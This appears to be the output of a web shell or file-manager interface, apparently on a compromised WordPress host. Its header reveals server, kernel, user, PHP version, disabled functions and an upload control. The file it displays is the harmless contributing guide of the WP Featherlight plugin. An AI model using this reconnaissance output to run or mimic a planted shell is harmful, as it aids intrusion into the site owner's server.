HEX
Server: Apache/2
System: Linux server-27-254-144-72.da.direct 5.10.0-33-amd64 #1 SMP Debian 5.10.226-1 (2024-10-03) x86_64
User: pokaorgani (1114)
PHP: 8.1.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/pokaorgani/public_html/wp-content/plugins/wp-featherlight/CONTRIBUTING.md
# Contributing to WP Featherlight

:+1::tada: First off, thanks for taking the time to contribute! :tada::+1:

Please make all pull requests against the develop branch. These are the steps required to get up and running with the development version of the plugin:

- Clone forked repo
- Run `yarn install`
- Run `bower install`
- Run `grunt build`
- Commit all changes and generated files and create a pull request against `develop`

If you run into any issues or have any questions, please open an issue.

Thanks again!